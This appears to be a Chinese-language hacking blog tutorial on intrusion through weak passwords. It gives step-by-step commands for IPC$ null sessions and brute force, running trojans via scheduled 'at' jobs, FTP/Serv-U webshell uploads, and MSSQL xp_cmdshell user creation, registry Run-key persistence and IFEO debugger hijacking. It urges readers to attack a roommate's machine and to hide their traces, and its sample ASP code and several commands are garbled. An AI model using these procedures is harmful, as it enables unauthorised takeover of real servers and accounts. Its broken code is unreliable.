1. 程式人生 > >web入侵二之弱口令攻擊及其他

web入侵二之弱口令攻擊及其他

一、什麼是弱口令

  就是說由常用數字、字母、字元等組合成的,容易被別人通過簡單及平常的思維方式就能猜到的密碼,利用弱口令結合計算機系統等漏洞可以做到入侵的事半功倍的效果

二、共享入侵--IPC$

    IPC$是共享“命名管道”資源,它是為了讓程序間通訊而開放的命令管道,可以通過驗證使用者名稱和密碼獲取相應的許可權,在遠端管理計算機和檢視計算機的共享資源是使用,利用IPC$,攻擊者甚至可以與目標主機建立一個空的連線而無需使用者名稱和密碼,前提是對方開啟了IPC$共享。

1、如何利用iPC$入侵

 第一步,利用空連線得到目標主機上的使用者列表,使用命令,例如:net use \\192.168.1.200\

ipc$"/user:"" 建立連線,

    第二步,採用爆破方法掃描得到使用者名稱和密碼 ,其實就是net use z:\\192.168.1.200\c$,不斷的暴力嘗試

    第三步,得到使用者名稱和密碼後 登入對方電腦,net use \\192.168.1.200\ipc$ "test" /user:administrator,net use z:\\192.168.1.203\ipc$

    第四步,開啟我的電腦發現多了一個z盤,其實就是目標機的c盤內容了

    第五步,上傳木馬後門,exe檔案或者bat檔案都可以,就是複製貼上就行了

   第六步,執行木馬後門,利用at命令設定時間執行該程式,先net time \\192.168.1.203

命令檢視系統時間,而後領用at命令at \\192.168.1.203 21:05 c:\test.bat,就可以讓目標機在預定時間只用木馬,而後淪為肉雞。

2、IPC$入侵注意事項

    第一,不要把\寫成了/

    第二,在建立空連線的時候,引號的輸入應在英文狀態下輸入

3、如何防範IPC$入侵

     第一,cmd下輸入命令:net share 看看自己的機器開了多少共享

    第二,再用net share 共享名/del刪除共享

    第三,最徹底的辦法就是禁用IPC$服務,命令為:net stop server,而後輸入y即可

   以上就是IPC$入侵的大致過程,不妨自己虛擬機器環境下自己動手執行一下,或者黑一下室友的機子。。。。。。。。。。。

三、目錄瀏覽

    目錄瀏覽是基於web服務的,也就是說如果web服務配置不當,就可以導致攻擊者瀏覽web目錄下的任意檔案和目錄。如IIS、apache、tomcat等web伺服器都有可能存在這樣的問題。

四、暴庫

    暴庫,就是通過一些技術手段或者程式漏洞得到資料庫的地址,並將資料非法下載到本地。這裡要了解兩個概念:相對路徑(如D:/text/text.txt)和絕對路徑(如:/text/text.txt)。

暴庫有兩個方法來實現,第一個就是利用%5c,另外一個就是conn.asp暴庫。

    1、%5c暴庫

    簡單的說就是在開啟網頁時,將/換成%5c,然後提交就可以得到資料庫地址了,但必須是需要呼叫資料庫的頁面,比如登入等,

    原因:

     這和IIS的解析有關,%5c是\的十六進位制程式碼,也就是\的另一種表達方式,我們在提交網頁時,IE會自動把%5c轉換成/,從而得到同一地址,可是ISS並不這樣認為,應為來了一個%5c(也就是/),雖然IE解析的時候是一個意思,可在ISS這裡卻認為訪問到\這裡就到了根目錄所在的地方,而不再往上解析了。

2、con.asp 暴庫

    同%5c的方法一樣,%5c是利用絕對路徑出錯,而con.asp是利用相對路徑出錯。

    例如,conn.sap程式碼:

    <%

db="kerally database/kenerldatabase.mdb"

constr="DB!"+server.mappath(do)+"DefaultDir=DRIVER{Microsoft Acess Driver(*mb)|.Pwd=kenanel"

set com=server.createObject("ADODB ,Connection"

con.open.coratr

Sub.rsclose()

     rs.Close()

set rs=nothing

End sub

sub.conclose()

conn.close()

set conn=nothing

End sub

%>

第一句中,呼叫資料庫相對路徑是”kenatlybdatabase/kenandatabase.mdb"..conn.asp檔案一般是起呼叫資料庫作用的,如果呼叫檔案和conn.asp檔案的相對位置發生變化了,那麼就會出現暴庫。

3、暴庫的防範

(1)及時更新發現過的漏洞,也就是把IIS升級到最新版本

(2)在conn.asp暴庫中,限制檔案暴庫,也就是讓他不暴庫繼續執行,加入一些程式碼即可

五、弱口令攻擊

     弱口令,設計到電腦的各種口令設定簡單的後果,比如FTP、SSH燈各種服務,抑或管理平臺的口令,都可能被攻擊者不費任何力氣獲得,從而導致伺服器的淪陷。

下面就把一些常用的基於大眾的弱口令方法描寫出來。

1、FTP弱口令

     FTP(FILE TRANSFER Protocol)是檔案傳輸協議的簡稱,用於Internet上傳檔案的雙向傳輸。同時,它也是一個應用程式,使用者可以通過它把自己的PC機與各地的所有執行FTP協議的伺服器相連,訪問伺服器上的大量資訊。

     例如,我們可以利用FTP讀取、上傳、刪除、建立檔案或者程式,如果得到了一個許可權很大的FTP賬號,後果是比較嚴重的,現在比較流行的還有SerV-u工具。

    第一步,連線ftp伺服器,方式:ftp 伺服器IP地址

    第二部,使用hscan工具掃描開始IP和結束IP,也可以挑選要掃描的IP,這裡我們輸入目的ftp伺服器IP

    第三部,掃描結束後,如果對方是弱口令,我們將得到連線ftp伺服器的使用者名稱和密碼

    第四步,如果對方使用的是Serv-u,可以直接加一個系統賬戶,命令為:quote site exec net user guest /avtive:yes(這一句的作用是把系統內建賬戶guest啟用),如果serv-u沒有許可權執行命令的話,我們就要換一種思路了

    第五步,既然無法直接新增系統使用者,可以先使用dir命令看一下有什麼檔案,如果檢視到admin、upload這樣目錄,還有index.htm,這裡就要注意啦,很可能一個web目錄,此時我們可以穿一個後門asp指令碼就可能得到一個shell.

   第六步,找到思路後,我們要先知道後門被傳到哪裡了,也就是說我們要能通過url連線到我們的後門地址,先把它的index下載到本地看一下里面是什麼內容,命令為:

get index.htm c:\index.htm,就是把index.htm檔案下載到本機c盤裡面。

     第七步,根據內容找到伺服器的URL,這個主要通過社工,如百度等

     第八步,直接通過ftp上傳一個asp指令碼木馬上去,命令為:put F:\web木馬\asp馬\dama.asp。

     第九步,接著開啟http://www.xx.com/dama.asp,輸入後門密碼,這個shell自帶serv-u提權功能,點選serv-u提權,然後新增使用者即可。

     第十步,佔領3389埠,mstsc 輸入使用者名稱和密碼,這樣就成功佔領伺服器的桌面了。

     注意:

     第一,得到ftp密碼後如果不能直接利用,不要死盯一點,一般ftp服務的都會有web服務,應該把目光放大一點,充分利用資源

     第二,就是要利用盡可能多的方法來收集對方的資訊

     第三,隱藏自己的入侵痕跡,你懂得。

2、基於MSSQL弱口令的入侵

     MSSQL其實是一個關係資料庫管理系統,是Microsoft推出的新一代資料管理與分析軟體,它是一個全面的、整合的、端到端的資料解決方案,為企業中的使用者提供了一個安全,可靠和高效的平臺,用於企業資料管理和商業智慧應用,所以適合一些大型網站的使用

     如何利用已知使用者名稱和密碼的情況下拿到伺服器許可權

相關知識:

     1、 在SQL server中,主要有兩種角色型別:伺服器角色與資料庫角色,攻擊者在攻擊時,會遇到三種角色:sa許可權、db_owner許可權和public許可權

      (1)sa許可權

         是system和Admin的縮寫,為MSSQL資料庫的預設系統賬號,具有最高許可權,第一次安裝MSSQL時,如果sa密碼過於簡單,攻擊者很可能用hscan或者x-scan等暴力破解工具通過字典爆破的方式得到使用者名稱和密碼,然後再通過sql聯結器燈工具連到1433埠(MSSQL預設埠),利用擴充套件儲存執行系統命令。

     (2)Db_owner許可權:

      其中db是database的縮寫,owner是擁有者的意思。從字面上我們就可以猜出db_owner是指某個資料庫的擁有者,它擁有對資料庫的修改、刪除等大部分儲存過程的許可權,但是涉及到系統敏感操作時,它是沒有許可權的,如前面提到的xp_cmdshell等

     (3)public許可權

     public的許可權相對較小,不過還是有可以利用到的地方比如目錄、建立臨時表等。

     第一步,假如我們已經掃描到一臺擁有弱口令的機器,使用者名稱是sa,口令為admin,我們首先通過sqltools.exe連線上去試一下,不然就試一下MSSQL聯結器.exe,或者sql查詢分析器分離版本連線。

    第二步,執行exec xp_cmdshell ‘net user test test /add'、exec xp_cmdshell、net localgroup adminis-trators text /add'命令成功新增具有管理員許可權的使用者

    第三步,假如管理員做了手腳,把xp_cmdshell這個儲存過程刪了,或者關閉了

    開啟xp_cmdshell:

    EXEC sp__configure 'show advanced options',1,RECONFIGURE;:EXEC sp_configre 'xp_configure' 1 RECONFIGLRE;

    恢復xp_cmdshell:

    EXEC sp_addexiendeproc xp_cmdshell @dllname='xplog70.dll

   第四步,操作登錄檔提權主要有兩種思路,一種就是利用登錄檔啟動項,執行以下程式碼

exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','Software\microsoft\windows\currentversion\policies\explorer\run','running','REG_SZ','c:\windows\system32\cmd.exe /c net user 1st 1st /add'

     這樣只要等待伺服器重啟就會執行程式碼,從而新增一個使用者名稱和密碼都為1st的使用者。既然能操作登錄檔了,我們就可以用映象劫持之類的技術來達到不需要重啟就可以直接佔領3389的目的。

    第五步,瞭解映象劫持,利用其滲透

    映象劫持(IFEO)就是image file exeution options,它位於登錄檔HKEY_LOCAL_MACHINE\SOFTWRE\Microsoft\Windows NT\CurrentVersion\CurrentVersion\Image File Executions,最關鍵的是,這個鍵值下有一個Debugger引數,“偵錯程式",它是IFEO裡被第一個被處理的引數,其作用如下:

    系統如果發現某個程式檔案在IFEO列表中,它就會首先來讀取 Debugger引數,如果該引數不為空,系統就會把Debugger引數裡指定的程式檔名作為使用者嘗試啟動的程式執行請求來處理。其本身目的是雙擊程式檔案就進入除錯,但是黑客如果換成cmd.exe或者exploer.exe就可以直接執行系統命令了,程式碼如下

   exec master.dbo.xp-regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\\Micosoft\\Windows NT\\CurentVersion\\Image File Exection\\setc.exe','debugger','REG_SZ','C:\\windows\\exploer.exe'

    第六步,進入桌面程式 新增登入賬號。

3.基於MySql弱口令的入侵 4 基於oracle弱口令的入侵 5。tomcat弱口令的入侵  6、第三方管理工具radmin和vnc弱口令入侵